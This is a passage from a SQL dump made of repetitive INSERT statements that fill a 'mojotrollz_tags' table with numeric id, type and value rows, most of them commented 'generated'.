VALUES (14621, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14621, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14622, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14622, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14623, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14624, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14624, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14625, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14625, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14626, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14626, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14627, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14627, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14628, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14628, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14629, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14630, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14631, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14632, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14633, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14634, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14634, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14635, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14636, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14637, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14637, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14638, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14639, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14640, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14645, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14646, 1, 1, 329, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14646, 1, 2, 2017, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14646, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14661, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14661, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14662, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14663, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14664, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14666, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14667, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14668, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14681, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14682, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14684, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14686, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14690, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14693, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14695, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14697, 1, 30, 4, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14715, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14715, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14717, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14717, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14717, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14717, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14717, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14718, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14718, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14718, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14718, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14718, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14720, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14720, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14720, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14720, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14720, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14720, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14721, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14721, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14722, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14722, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14723, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14723, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14724, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14724, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14725, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14725, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14726, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14726, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14726, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14726, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14726, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14726, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14727, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14727, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14727, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14727, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14727, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14727, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14728, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14728, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14729, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14729, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14729, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14729, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14729, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14730, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14730, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14731, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14731, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14732, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14733, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14733, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14734, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14734, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14736, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14736, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14737, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14737, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14738, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14738, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14739, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14739, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14740, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14740, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14741, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14741, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14742, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14742, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14743, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14743, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14744, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14745, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14748, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14750, 1, 1, 309, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14750, 1, 2, 19, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14750, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14751, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14752, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14753, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14753, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14754, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14754, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14754, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14754, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14754, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14757, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14757, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14758, 1, 1, 309, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14758, 1, 2, 19, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14758, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14761, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14762, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14762, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14762, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14763, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14763, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14763, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14764, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14764, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14764, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14765, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14765, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14765, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14766, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14766, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14766, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14767, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14768, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14768, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14768, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14769, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14769, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14769, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14770, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14771, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14772, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14772, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14772, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14773, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14773, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14773, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14774, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14774, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14774, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14775, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14775, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14775, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14776, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14776, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14776, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14777, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14777, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14777, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14781, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14781, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14781, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14781, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14781, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14821, 1, 1, 309, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14821, 1, 2, 19, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14821, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14822, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14822, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14823, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14823, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14825, 1, 1, 309, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14825, 1, 2, 19, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14825, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14826, 1, 1, 309, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14826, 1, 2, 19, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14826, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14827, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14827, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14828, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14828, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14829, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14829, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14832, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14832, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14833, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14833, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14834, 1, 1, 309, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14834, 1, 2, 19, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14834, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14841, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14841, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14842, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14843, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14843, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14844, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14844, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14845, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14845, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14846, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14846, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14847, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14847, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14848, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14849, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14849, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14850, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14850, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14850, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14850, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14850, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14857, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14857, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14857, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14857, 1, 10, 1, NULL); INSERT INTO 